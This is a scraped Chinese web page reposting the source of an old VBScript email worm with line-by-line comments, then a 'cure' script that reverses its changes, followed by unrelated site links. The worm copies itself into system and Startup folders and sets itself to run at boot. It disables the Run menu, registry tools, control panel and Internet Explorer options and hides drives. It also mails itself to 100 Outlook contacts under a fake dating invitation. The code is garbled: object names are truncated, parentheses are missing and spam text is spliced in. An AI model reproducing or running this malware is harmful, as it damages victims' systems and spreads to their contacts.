vbs病毒代码
seo靠我 2023-09-25 17:18:34vbs病毒代碼 2007-07-11 21:26 on error resume next
set fs=createobject("ing.fileSEO靠我systemobject" 创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作
set dir1=fs.getspecialfolder(0) 获取windows/winnt文件夹位SEO靠我置
set dir2=fs.getspecialfolder(1) 获取system32/system文件夹位置
set so=createobject("ing.filesystemobject"
dimSEO靠我 r 定义一个变量
set r=createobject("w.shell"
so.getfile(w.fullname).copy(dir1&"/win32system.vbs" 复制病毒副本到windSEO靠我ows/winnt文件夹位置
so.getfile(w.fullname).copy(dir2&"/win32system.vbs" 复制病毒副本到system32/system文件夹位置
so.getfSEO靠我ile(w.fullname).copy(dir1&"/start menu/programs/启动/win32system.vbs" 复制病毒副本到start menu启动菜单
下面是对注册表的恶意修SEO靠我改和简单的依靠oe传播
r.regwrite "hkcu/software/microsoft/windows/currentversion/policies/explorer/norun",1,"reSEO靠我g_dword" 修改注册表,禁止“运行”菜单
r.regwrite "kcu/software/microsoft/windows/currentversion/policies/explorer/nSEO靠我oclose",1,"reg_dword" 修改注册表,禁止“关闭”菜单
r.regwrite "hkcu/software/microsoft/windows/currentversion/policSEO靠我ies/explorer/nodrives",63000000,"reg_dword" 修改注册表,隐藏所有逻辑盘符
r.regwrite "hkcu/software/microsoft/windowSEO靠我s/currentversion/policies/system/disableregistrytools",1,"reg_dword" 修改注册表,禁止注册表编辑
r.regwrite "hklm/sSEO靠我oftware/microsoft/windows/currentversion/run/scanregistry","" 修改注册表,禁止开机注册表扫描
r.regwrite "hkcu/softwaSEO靠我re/microsoft/windows/currentversion/policies/explorer/nologoff",1,"reg_dword" 修改注册表,禁止“注销”菜单
r.regwriSEO靠我te "hkcu/software/microsoft/windows/currentversion/policies/winoldapp/norealmode",1,"reg_dword" 修改注册SEO靠我表,禁止ms-dos实模式
r.regwrite "hklm/software/microsoft/windows/currentversion/run/win32system","win32systeSEO靠我m.vbs" 修改注册表,使这个脚本本身开机自动运行
r.regwrite "hkcu/software/microsoft/windows/currentversion/policies/explorSEO靠我er/nodesktop",1,"reg_dword" 修改注册表,禁止显示桌面图标
r.regwrite "hkcu/software/microsoft/windows/currentversionSEO靠我/policies/winoldapp/disabled",1,"reg_dword" 修改注册表,禁止纯dos模式
r.regwrite "hkcu/software/microsoft/windowSEO靠我s/currentversion/policies/explorer/nosettaskbar",1,"reg_dword" 修改注册表,禁止“任务栏和开始”菜单
r.regwrite "hkcu/soSEO靠我ftware/microsoft/windows/currentversion/policies/explorer/noviewcontextmenu",1,"reg_dword" 修改注册表,禁止右SEO靠我键菜单
r.regwrite "hkcu/software/microsoft/windows/currentversion/policies/explorer/nosetfolders",1,"regSEO靠我_dword" 修改注册表,禁止控制面板
r.regwrite "hklm/software/classes/.reg/","txtfile" 修改注册表,禁止导入使用.reg文件,改为用txt文件的关SEO靠我联
r.regwrite "hklm/software/microsoft/windows/currentversion/winlogon/legalnoticecaption","警告" 设置开机提示SEO靠我框标题
r.regwrite "hklm/software/microsoft/windows/currentversion/winlogon/legalnoticetext","您中vbs脚本病毒了,SEO靠我哭吧~" 设置开机提示框文本内容
set ol=createobject("outlook.application" 创建outlook文件对象用于传播
on error resume next
for xSEO靠我=1 to 100
set mail=ol.createitem(0)
mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) 用SEO靠我于向地址簿的前100名发送此 vbs病毒,可以算是简单弱智的蠕虫了吧~~
mail.subject="今晚你来吗?" 邮件主题
mail.body="朋友你好:您的朋友rose给您发来了热情的邀请。具体情SEO靠我况请阅读随信附件,祝您好运! 同城约会网" 邮件内容
mail.attachments.add(dir2&"win32system.vbs"
mail.send
next
ol.quit
下面是对interneSEO靠我t explore 选项的恶意修改
r.regwrite "hkcu/software/policies/microsoft/internet explorer/restrictions/nobrowsSEO靠我ercontextmenu",1,"reg_dword" 修改注册表,禁止鼠标右键
r.regwrite "hkcu/software/policies/microsoft/internet exploSEO靠我rer/restrictions/nobrowseroptions",1,"reg_dword" 修改注册表,禁止internet选项
r.regwrite "hkcu/software/policieSEO靠我s/microsoft/internet explorer/restrictions/nobrowsersaveas",1,"reg_dword" 修改注册表,禁止“另存为”
r.regwrite "hSEO靠我kcu/software/policies/microsoft/internet explorer/restrictions/nofileopen",1,"reg_dword" 修改注册表,禁止“文件SEO靠我/打开”菜单
r.regwrite "hkcu/software/policies/microsoft/internet explorer/control panel/advanced",1,"reg_SEO靠我dword" 修改注册表,禁止更改高级页设置
r.regwrite "hkcu/software/policies/microsoft/internet explorer/control panel/cSEO靠我ache internet",1,"reg_dword" 修改注册表,禁止更改临时文件设置
r.regwrite "hkcu/software/policies/microsoft/internet eSEO靠我xplorer/control panel/autoconfig",1,"reg_dword" 修改注册表,禁止更改自动配置
r.regwrite "hkcu/software/policies/micSEO靠我rosoft/internet explorer/control panel/homepage",1,"reg_dword" 修改注册表,禁止更改主页,即“主页”变灰
r.regwrite "hkcu/SEO靠我software/policies/microsoft/internet explorer/control panel/history",1,"reg_dword" 修改注册表,禁止更改历史记录设置
rSEO靠我.regwrite "hkcu/software/policies/microsoft/internet explorer/control panel/connwiz admin lock",1,"rSEO靠我eg_dword" 修改注册表,禁止更改internet连接向导
r.regwrite "hkcu/software/policies/microsoft/internet explorer/contrSEO靠我ol panel/securitytab",1,"reg_dword" 修改注册表,禁止更改安全项
r.regwrite "hkcu/software/policies/microsoft/internSEO靠我et explorer/control panel/resetwebsettings",1,"reg_dword" 修改注册表,禁止“重置web设置”
r.regwrite "hkcu/softwareSEO靠我/policies/microsoft/internet explorer/restrictions/noviewsource",1,"reg_dword" 修改注册表,禁止查看源文件
r.regwriSEO靠我te "hkcu/software/policies/microsoft/internet explorer/infodelivery/restrictions/noaddingsubions",1,SEO靠我"reg_dword" 修改注册表,禁止添加脱机计划
r.regwrite "hkcu/software/microsoft/windows/currentversion/policies/explorSEO靠我er/nofilemenu",1,"reg_dword" 修改注册表,禁止“文件”菜单
下面就是“解药”--恢复文件reset.vbs的源代码:
(由于这里与上面的病毒破坏恶意修改恰好相反,故不做注释了)SEO靠我
set fs=createobject("ing.filesystemobject"
set dir1=fs.getspecialfolder(0)
set dir2=fs.getspecialfoldeSEO靠我r(1)
set so=createobject("ing.filesystemobject"
dim r
set r=createobject("w.shell"
r.regwrite "hklm/softSEO靠我ware/microsoft/windows/currentversion/runonce/deltree.exe","start.exe /m deltree /y "&dir1&"/win32sySEO靠我stem.vbs"
r.regwrite "hklm/software/microsoft/windows/currentversion/runonce/deltree.exe","start.exe SEO靠我/m deltree /y "&dir2&"/win32system.vbs"
r.regwrite "hklm/software/microsoft/windows/currentversion/ruSEO靠我nonce/deltree.exe","start.exe /m deltree /y "&dir1&"/start menu/programs/启动/win32system.vbs"
r.regwriSEO靠我te "hkcu/software/microsoft/windows/currentversion/policies/explorer/norun",0,"reg_dword"
r.regwrite SEO靠我"hkcu/software/microsoft/windows/currentversion/policies/explorer/noclose",0,"reg_dword"
r.regwrite "SEO靠我hkcu/software/microsoft/windows/currentversion/policies/explorer/nodrives",0,"reg_dword"
r.regwrite "SEO靠我hkcu/software/microsoft/windows/currentversion/policies/system/disableregistrytools",0,"reg_dword"
r.SEO靠我regwrite "hklm/software/microsoft/windows/currentversion/run/scanregistry","scanregw.exe /autorun"
r.SEO靠我regwrite "hkcu/software/microsoft/windows/currentversion/policies/explorer/nologoff",0,"reg_dword"
r.SEO靠我regwrite "hkcu/software/microsoft/windows/currentversion/policies/winoldapp/norealmode",0,"reg_dwordSEO靠我"
r.regwrite "hklm/software/microsoft/windows/currentversion/run/win32system",""
r.regwrite "hkcu/softSEO靠我ware/microsoft/windows/currentversion/policies/explorer/nodesktop",0,"reg_dword"
r.regwrite "hkcu/sofSEO靠我tware/microsoft/windows/currentversion/policies/winoldapp/disabled",0,"reg_dword"
r.regwrite "hkcu/soSEO靠我ftware/microsoft/windows/currentversion/policies/explorer/nosettaskbar",0,"reg_dword"
r.regwrite "hkcSEO靠我u/software/microsoft/windows/currentversion/policies/explorer/noviewcontextmenu",0,"reg_dword"
r.regwSEO靠我rite "hkcu/software/microsoft/windows/currentversion/policies/explorer/nosetfolders",0,"reg_dword"
r.SEO靠我regwrite "hklm/software/microsoft/windows/currentversion/winlogon/legalnoticecaption",""
r.regwrite "SEO靠我hklm/software/microsoft/windows/currentversion/winlogon/legalnoticetext",""
r.regwrite "hkcu/softwareSEO靠我/policies/microsoft/internet explorer/restrictions/nobrowsercontextmenu",0,"reg_dword"
r.regwrite "hkSEO靠我cu/software/policies/microsoft/internet explorer/restrictions/nobrowseroptions",0,"reg_dword"
r.regwrSEO靠我ite "hkcu/software/policies/microsoft/internet explorer/restrictions/nobrowsersaveas",0,"reg_dword"
rSEO靠我.regwrite "hkcu/software/policies/microsoft/internet explorer/restrictions/nofileopen",0,"reg_dword"SEO靠我
r.regwrite "hkcu/software/policies/microsoft/internet explorer/control panel/advanced",0,"reg_dword"SEO靠我
r.regwrite "hkcu/software/policies/microsoft/internet explorer/control panel/cache internet",0,"reg_SEO靠我dword"
r.regwrite "hkcu/software/policies/microsoft/internet explorer/control panel/autoconfig",0,"reSEO靠我g_dword"
r.regwrite "hkcu/software/policies/microsoft/internet explorer/control panel/homepage",0,"reSEO靠我g_dword"
r.regwrite "hkcu/software/policies/microsoft/internet explorer/control panel/history",0,"regSEO靠我_dword"
r.regwrite "hkcu/software/policies/microsoft/internet explorer/control panel/connwiz admin loSEO靠我ck",0,"reg_dword"
r.regwrite "hkcu/software/policies/microsoft/internet explorer/control panel/securiSEO靠我tytab",0,"reg_dword"
r.regwrite "hkcu/software/policies/microsoft/internet explorer/control panel/resSEO靠我etwebsettings",0,"reg_dword"
r.regwrite "hkcu/software/policies/microsoft/internet explorer/restrictiSEO靠我ons/noviewsource",0,"reg_dword"
r.regwrite "hkcu/software/policies/microsoft/internet explorer/infodeSEO靠我livery/restrictions/noaddingsubions",0,"reg_dword"
r.regwrite "hkcu/software/microsoft/windows/currenSEO靠我tversion/policies/explorer/nofilemenu",0,"reg_dword最新发布
-
火车站存包怎么收费
2023-09-12
-
养老保险个人缴纳比例是多少
2023-09-12
-
上海交大附中浦东实验高中
2023-09-12
-
保鲜膜能放微波炉加热吗
2023-09-12
-
如何制作usb加热片
2023-09-12
-
折800特卖商城怎么样
2023-09-12
-
詹天佑的著名作品
2023-09-12
-
钓鱼岛又叫什么名字
2023-09-12
-
清美公司简介(5个范本)
2023-09-12
-
钱波个人资料简历
2023-09-12